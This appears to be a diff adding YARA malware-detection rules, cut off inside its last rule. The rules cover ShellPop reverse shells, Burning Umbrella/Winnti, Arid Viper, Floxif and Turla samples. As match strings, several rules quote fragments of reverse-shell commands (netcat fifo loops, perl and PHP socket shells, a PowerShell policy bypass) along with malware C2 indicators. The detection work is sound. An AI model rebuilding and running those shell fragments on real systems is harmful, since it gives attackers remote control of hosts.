+rule HKTL_shellpop_Netcat_UDP_RID3010 : DEMO HKTL {
+   meta:
+      description = "Detects suspicious netcat popshell"
+      author = "Tobias Michalski"
+      reference = "https://github.com/0x00-0x00/ShellPop"
+      date = "2018-05-18 12:23:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d823ad91b315c25893ce8627af285bcf4e161f9bbf7c070ee2565545084e88be"
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "mkfifo fifo ; nc.traditional -u" ascii
+      $s2 = "< fifo | { bash -i; } > fifo" fullword ascii
+   condition: 
+      filesize < 1KB and 1 of them
+}
+
+rule HKTL_shellpop_Perl_RID2DFC : DEMO HKTL SCRIPT {
+   meta:
+      description = "Detects Shellpop Perl script"
+      author = "Tobias Michalski"
+      reference = "https://github.com/0x00-0x00/ShellPop"
+      date = "2018-05-18 10:55:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "32c3e287969398a070adaad9b819ee9228174c9cb318d230331d33cda51314eb"
+      tags = "DEMO, HKTL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "perl -e 'use IO::Socket::INET;$|=1;my ($s,$r);" ascii
+      $ = ";STDIN->fdopen(\\$c,r);$~->fdopen(\\$c,w);s" ascii
+   condition: 
+      filesize < 2KB and 1 of them
+}
+
+rule HKTL_shellpop_Python_RID2EEB : DEMO HKTL MAL SCRIPT T1059_006 T1146 {
+   meta:
+      description = "Detects malicious python shell"
+      author = "Tobias Michalski"
+      reference = "https://github.com/0x00-0x00/ShellPop"
+      date = "2018-05-18 11:35:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "aee1c9e45a1edb5e462522e266256f68313e2ff5956a55f0a84f33bc6baa980b"
+      tags = "DEMO, HKTL, MAL, SCRIPT, T1059_006, T1146"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "os.putenv('HISTFILE', '/dev/null');" ascii
+   condition: 
+      filesize < 2KB and 1 of them
+}
+
+rule HKTL_shellpop_PHP_TCP_RID2E97 : DEMO HKTL MAL SCRIPT T1100 {
+   meta:
+      description = "Detects malicious PHP shell"
+      author = "Tobias Michalski"
+      reference = "https://github.com/0x00-0x00/ShellPop"
+      date = "2018-05-18 11:21:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0412e1ab9c672abecb3979a401f67d35a4a830c65f34bdee3f87e87d060f0290"
+      tags = "DEMO, HKTL, MAL, SCRIPT, T1100"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "php -r \"\\$sock=fsockopen" ascii
+      $x2 = ";exec('/bin/sh -i <&3 >&3 2>&3');\"" ascii
+   condition: 
+      filesize < 3KB and all of them
+}
+
+rule HKTL_shellpop_Powershell_TCP_RID31D4 : DEMO HKTL MAL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects malicious powershell"
+      author = "Tobias Michalski"
+      reference = "https://github.com/0x00-0x00/ShellPop"
+      date = "2018-05-18 13:39:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8328806700696ffe8cc37a0b81a67a6e9c86bb416364805b8aceaee5db17333f"
+      tags = "DEMO, HKTL, MAL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "Something went wrong with execution of command on the target" ascii
+      $ = ";[byte[]]$bytes = 0..65535|%{0};$sendbytes =" ascii
+   condition: 
+      filesize < 3KB and 1 of them
+}
+
+rule SUSP_Powershell_ShellCommand_May18_1_RID3475 : DEMO HKTL SCRIPT SUSP T1059_001 T1086 {
+   meta:
+      description = "Detects a supcicious powershell commandline"
+      author = "Tobias Michalski"
+      reference = "https://github.com/0x00-0x00/ShellPop"
+      date = "2018-05-18 15:31:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8328806700696ffe8cc37a0b81a67a6e9c86bb416364805b8aceaee5db17333f"
+      tags = "DEMO, HKTL, SCRIPT, SUSP, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "powershell -nop -ep bypass -Command" ascii
+   condition: 
+      filesize < 3KB and 1 of them
+}
+
+rule HKTL_shellpop_Telnet_TCP_RID301B : DEMO HKTL MAL SCRIPT {
+   meta:
+      description = "Detects malicious telnet shell"
+      author = "Tobias Michalski"
+      reference = "https://github.com/0x00-0x00/ShellPop"
+      date = "2018-05-18 12:25:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cf5232bae0364606361adafab32f19cf56764a9d3aef94890dda9f7fcd684a0e"
+      tags = "DEMO, HKTL, MAL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "if [ -e /tmp/f ]; then rm /tmp/f;" ascii
+      $x2 = "0</tmp/f|/bin/bash 1>/tmp/f" fullword ascii
+   condition: 
+      filesize < 3KB and 1 of them
+}
+
+rule HKTL_shellpop_netcat_RID2EE8 : DEMO HKTL {
+   meta:
+      description = "Detects suspcious netcat shellpop"
+      author = "Tobias Michalski"
+      reference = "https://github.com/0x00-0x00/ShellPop"
+      date = "2018-05-18 11:34:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "98e3324f4c096bb1e5533114249a9e5c43c7913afa3070488b16d5b209e015ee"
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if [ -e /tmp/f ]; then rm /tmp/f;" ascii
+      $s2 = "fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc" ascii
+      $s4 = "mknod /tmp/f p && nc" ascii
+      $s5 = "</tmp/f|/bin/bash 1>/tmp/f" ascii
+   condition: 
+      filesize < 2KB and 1 of them
+}
+
+rule SUSP_LNK_File_PathTraversal_RID311F : DEMO FILE SUSP T1023 T1210 {
+   meta:
+      description = "Detects a suspicious link file that references a file multiple folders lower than the link itself"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html"
+      date = "2018-05-16 13:09:01"
+      score = 40
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, SUSP, T1023, T1210"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "..\\..\\..\\..\\..\\" 
+   condition: 
+      uint16 ( 0 ) == 0x004c and uint32 ( 4 ) == 0x00021401 and ( filesize < 1KB and all of them )
+}
+
+rule MAL_Floxif_Generic_RID2DCE : DEMO EXE FILE GEN MAL {
+   meta:
+      description = "Detects Floxif Malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-05-11 10:47:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085"
+      tags = "DEMO, EXE, FILE, GEN, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "2f4ddcfebbcad3bacadc879747151f6f" or pe.exports ( "FloodFix" ) or pe.exports ( "FloodFix2" ) )
+}
+
+rule MAL_CN_FlyStudio_May18_1_RID2F5C : CHINA DEMO EXE FILE HKTL MAL {
+   meta:
+      description = "Detects malware / hacktool detected in May 2018"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-05-11 11:53:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b85147366890598518d4f277d44506eef871fd7fc6050d8f8e68889cae066d9e"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii
+      $s2 = "www.cfyhack.cn" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "65ae5cf17140aeaf91e3e9911da0ee3e" or 1 of them )
+}
+
+rule SUSP_Microsoft_Copyright_String_Anomaly_2_RID3720 : ANOMALY DEMO EXE FILE MAL SUSP {
+   meta:
+      description = "Detects Floxif Malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-05-11 17:25:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085"
+      tags = "ANOMALY, DEMO, EXE, FILE, MAL, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Microsoft(C) Windows(C) Operating System" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
+}
+
+rule MAL_BurningUmbrella_Sample_1_RID31A4 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:31:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fcfe8fcf054bd8b19226d592617425e320e4a5bb4798807d6f067c39dfc6d1ff"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = { 40 00 00 E0 75 68 66 61 6F 68 6C 79 } 
+      $s2 = { 40 00 00 E0 64 6A 7A 66 63 6D 77 62 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 4000KB and ( pe.imphash ( ) == "baa93d47220682c04d92f7797d9224ce" and $s1 in ( 0 .. 1024 ) and $s2 in ( 0 .. 1024 ) )
+}
+
+rule MAL_BurningUmbrella_Sample_2_RID31A5 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:31:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "801a64a730fc8d80e17e59e93533c1455686ca778e6ba99cf6f1971a935eda4c"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = { 40 00 00 E0 63 68 72 6F 6D 67 75 78 } 
+      $s2 = { 40 00 00 E0 77 62 68 75 74 66 6F 61 } 
+      $s3 = "ActiveX Manager" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and $s1 in ( 0 .. 1024 ) and $s2 in ( 0 .. 1024 ) and $s3
+}
+
+rule MAL_BurningUmbrella_Sample_3_RID31A6 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:31:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "92efbecc24fbb5690708926b6221b241b10bdfe3dd0375d663b051283d0de30f"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "HKEY_CLASSES_ROOT\\Word.Document.8\\shell\\Open\\command" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+}
+
+rule MAL_BurningUmbrella_Sample_6_RID31A9 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:32:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "49ef2b98b414c321bcdbab107b8fa71a537958fe1e05ae62aaa01fe7773c3b4b"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ExecuteFile=\"hidcon:nowait:\\\"Word\\\\r.bat\\\"\"" fullword ascii
+      $s2 = "InstallPath=\"%Appdata%\\\\Microsoft\"" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+}
+
+rule MAL_BurningUmbrella_Sample_7_RID31AA : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:32:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a4ce3a356d61fbbb067e1430b8ceedbe8965e0cfedd8fb43f1f719e2925b094a"
+      hash2 = "a8bfc1e013f15bc395aa5c047f22ff2344c343c22d420804b6d2f0a67eb6db64"
+      hash3 = "959612f2a9a8ce454c144d6aef10dd326b201336a85e69a604e6b3892892d7ed"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and pe.imphash ( ) == "f5b113d6708a3927b5cc48f2215fcaff"
+}
+
+rule MAL_BurningUmbrella_Sample_8_RID31AB : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:32:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "73270fe9bca94fead1b5b38ddf69fae6a42e574e3150d3e3ab369f5d37d93d88"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cmd /c open %s" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+}
+
+rule MAL_BurningUmbrella_Sample_10_RID31D4 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:39:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "70992a72412c5d62d003a29c3967fcb0687189d3290ebbc8671fa630829f6694"
+      hash2 = "48f0bbc3b679aac6b1a71c06f19bb182123e74df8bb0b6b04ebe99100c57a41e"
+      hash3 = "5475ae24c4eeadcbd49fcd891ce64d0fe5d9738f1c10ba2ac7e6235da97d3926"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "revjj.syshell.org" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule MAL_BurningUmbrella_Sample_11_RID31D5 : APT DEMO FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:39:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "278e9d130678615d0fee4d7dd432f0dda6d52b0719649ee58cbdca097e997c3f"
+      tags = "APT, DEMO, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Resume.app/Contents/Java/Resume.jarPK" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x4b50 and filesize < 700KB and 1 of them
+}
+
+rule MAL_BurningUmbrella_Sample_12_RID31D6 : APT DEMO EXE FILE MAL T1050 T1085 {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:39:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b9aba520eeaf6511877c1eec5f7d71e0eea017312a104f30d3b8f17c89db47e8"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1050, T1085"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $s1 = "%SystemRoot%\\System32\\qmgr.dll" fullword ascii
+      $s2 = "rundll32.exe %s,Startup" fullword ascii
+      $s3 = "nvsvcs.dll" fullword wide
+      $s4 = "SYSTEM\\CurrentControlSet\\services\\BITS\\Parameters" fullword ascii
+      $s5 = "http://www.sginternet.net 0" fullword ascii
+      $s6 = "Microsoft Corporation. All rights reserved." fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 80KB and ( pe.exports ( "SvcServiceMain" ) and 5 of them )
+}
+
+rule MAL_BurningUmbrella_Sample_13_RID31D7 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:39:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d31374adc0b96a8a8b56438bbbc313061fd305ecee32a12738dd965910c8890f"
+      hash2 = "c74a8e6c88f8501fb066ae07753efe8d267afb006f555811083c51c7f546cb67"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "75f201aa8b18e1c4f826b2fe0963b84f"
+}
+
+rule MAL_BurningUmbrella_Sample_14_RID31D8 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:39:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "388ef4b4e12a04eab451bd6393860b8d12948f2bce12e5c9022996a9167f4972"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "C:\\tmp\\Google_updata.exe" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 40KB and 1 of them
+}
+
+rule MAL_BurningUmbrella_Sample_15_RID31D9 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:40:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "be6bea22e909bd772d21647ffee6d15e208e386e8c3c95fd22816c6b94196ae8"
+      hash2 = "72a8fa454f428587d210cba0e74735381cd0332f3bdcbb45eecb7e271e138501"
+      hash3 = "9cc38ea106efd5c8e98c2e8faf97c818171c52fa3afa0c4c8f376430fa556066"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 50KB and pe.imphash ( ) == "cc33b1500354cf785409a3b428f7cd2a"
+}
+
+rule MAL_BurningUmbrella_Sample_16_RID31DA : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:40:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "58bb3859e02b8483e9f84cc56fbd964486e056ef28e94dd0027d361383cc4f4a"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "http://netimo.net 0" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and all of them
+}
+
+rule MAL_BurningUmbrella_Sample_17_RID31DB : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:40:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fa380dac35e16da01242e456f760a0e75c2ce9b68ff18cfc7cfdd16b2f4dec56"
+      hash2 = "854b64155f9ceac806b49f3e352949cc292e5bc33f110d965cf81a93f78d2f07"
+      hash3 = "1e462d8968e8b6e8784d7ecd1d60249b41cf600975d2a894f15433a7fdf07a0f"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "syshell" fullword wide
+      $s2 = "Normal.dotm" fullword ascii
+      $s3 = "Microsoft Office Word" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of them
+}
+
+rule MAL_BurningUmbrella_Sample_18_RID31DC : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:40:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d8df60524deb6df4f9ddd802037a248f9fbdd532151bb00e647b233e845b1617"
+      hash2 = "c55cb6b42cfabf0edf1499d383817164d1b034895e597068e019c19d787ea313"
+      hash3 = "32144ba8370826e069e5f1b6745a3625d10f50a809f3f2a72c4c7644ed0cab03"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "c:\\tmp\\tran.exe" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "11675b4db0e7df7b29b1c1ef6f88e2e1" or pe.imphash ( ) == "364e1f68e2d412db34715709c68ba467" or pe.exports ( "deKernel" ) or 1 of them )
+}
+
+rule MAL_BurningUmbrella_Sample_19_RID31DD : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:40:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "05e2912f2a593ba16a5a094d319d96715cbecf025bf88bb0293caaf6beb8bc20"
+      hash2 = "e7bbdb275773f43c8e0610ad75cfe48739e0a2414c948de66ce042016eae0b2e"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Cryption.dll" fullword ascii
+      $s2 = "tran.exe" fullword ascii
+      $s3 = "Kernel.dll" fullword ascii
+      $s4 = "Now ready to get the file %s!" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
+}
+
+rule MAL_BurningUmbrella_Sample_20_RID31D5 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:39:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "5c12379cd7ab3cb03dac354d0e850769873d45bb486c266a893c0daa452aa03c"
+      hash2 = "172cd90fd9e31ba70e47f0cc76c07d53e512da4cbfd197772c179fe604b75369"
+      hash3 = "1ce88e98c8b37ea68466657485f2c01010a4d4a88587ba0ae814f37680a2e7a8"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "Wordpad.Document.1\\shell\\open\\command\\" wide
+      $s2 = "%s\\shell\\Open\\command" fullword wide
+      $s3 = "expanding computer" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "bac338bfe2685483c201e15eae4352d5" or 2 of them )
+}
+
+rule MAL_BurningUmbrella_Sample_21_RID31D6 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:39:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4b7b9c2a9d5080ccc4e9934f2fd14b9d4e8f6f500889bf9750f1d672c8724438"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "c:\\windows\\ime\\setup.exe" fullword ascii
+      $s2 = "ws.run \"later.bat /start\",0Cet " fullword ascii
+      $s3 = "del later.bat" fullword ascii
+      $s4 = "mycrs.xls" fullword ascii
+      $a1 = "-el -s2 \"-d%s\" \"-p%s\" \"-sp%s\"" fullword ascii
+      $a2 = "<set ws=wscript.createobject(\"wscript.shell\")" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 2 of them
+}
+
+rule MAL_BurningUmbrella_Sample_22_RID31D7 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 13:39:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "fa116cf9410f1613003ca423ad6ca92657a61b8e9eda1b05caf4f30ca650aee5"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\" ascii
+      $s3 = "Content-Disposition: form-data; name=\"txt\"; filename=\"" fullword ascii
+      $s4 = "Fail To Enum Service" fullword ascii
+      $s5 = "Host Power ON Time" fullword ascii
+      $s6 = "%d Hours %2d Minutes %2d Seconds " fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 4 of them
+}
+
+rule MAL_AirdViper_Sample_Apr18_1_RID310C : APT DEMO EXE FILE MAL MIDDLE_EAST {
+   meta:
+      description = "Detects Arid Viper malware sample"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-05-04 13:05:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9f453f1d5088bd17c60e812289b4bb0a734b7ad2ba5a536f5fd6d6ac3b8f3397"
+      tags = "APT, DEMO, EXE, FILE, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"%s\"" fullword ascii
+      $x2 = "daenerys=%s&" ascii
+      $x3 = "betriebssystem=%s&anwendung=%s&AV=%s" ascii
+      $s1 = "Taskkill /IM  %s /F &  %s" fullword ascii
+      $s2 = "/api/primewire/%s/requests/macKenzie/delete" fullword ascii
+      $s3 = "\\TaskWindows.exe" ascii
+      $s4 = "MicrosoftOneDrives.exe" fullword ascii
+      $s5 = "\\SeanSansom.txt" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 6000KB and ( 1 of ( $x* ) or 4 of them )
+}
+
+rule MAL_Winnti_Sample_May18_1_RID3003 : APT CHINA DEMO EXE FILE G0044 GEN MAL {
+   meta:
+      description = "Detects malware sample from Burning Umbrella report - Generic Winnti Rule"
+      author = "Florian Roth"
+      reference = "https://401trg.pw/burning-umbrella/"
+      date = "2018-05-04 12:21:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41"
+      tags = "APT, CHINA, DEMO, EXE, FILE, G0044, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "wireshark" fullword wide
+      $s2 = "procexp" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+
+rule MAL_Turla_Sample_May18_1_RID2F92 : DEMO EXE FILE G0010 MAL RUSSIA {
+   meta:
+      description = "Detects Turla samples"
+      author = "Florian Roth"
+      reference = "https://twitter.com/omri9741/status/991942007701598208"
+      date = "2018-05-03 12:02:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4c49c9d601ebf16534d24d2dd1cab53fde6e03902758ef6cff86be740b720038"
